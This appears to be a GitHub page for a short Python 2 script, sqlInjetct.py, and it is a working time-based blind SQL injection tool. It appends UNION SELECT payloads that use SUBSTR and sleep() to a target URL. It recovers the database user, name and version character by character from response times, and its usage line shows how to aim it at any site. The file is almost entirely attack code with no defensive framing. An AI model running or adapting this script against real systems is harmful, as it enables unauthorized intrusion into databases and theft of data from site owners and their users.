-
Notifications
You must be signed in to change notification settings - Fork 172
/
sqlInjetct.py
45 lines (42 loc) · 1.3 KB
/
sqlInjetct.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
# -*- coding: utf-8 -*-
# @Author: lock
# @Date: 2017-02-12 21:32:31
# @Last Modified by: lock
# @Last Modified time: 2017-02-12 21:32:42
import sys
import string
import time,datetime
import requests
def main(url):
print('Loding...')
print('Start Attack ....')
# payload = list(string.ascii_letters)
payload = list(string.ascii_lowercase)
payload += ['_', '.','@',',','-']
payload += [str(num) for num in range(0,10)]
maxLength = 30
exploit = []
for i in xrange(maxLength):
for element in payload:
t1 = time.time()
poc = url+" union select if((ord(SUBSTR(concat_ws(' ---- ',user(),database(),version()),"+str(i+1)+",1))=ord('"+element+"'))=1,sleep(0),sleep(0.5)),2,3"
response = requests.get(poc)
if response.status_code==200:
t2 = time.time()
if t2-t1<0.5:
exploit.append(element)
print(''.join(exploit)+'...')
continue
print('Finish...')
def help():
print('-----Usage:-----\n')
print('Example:\npython sqlInject.py -u http://xxx.xxx.com/id=123')
if __name__ == '__main__':
args = sys.argv
if len(args) == 3:
if args[1] == '-u':
main(args[2])
else:
help()
else:
help()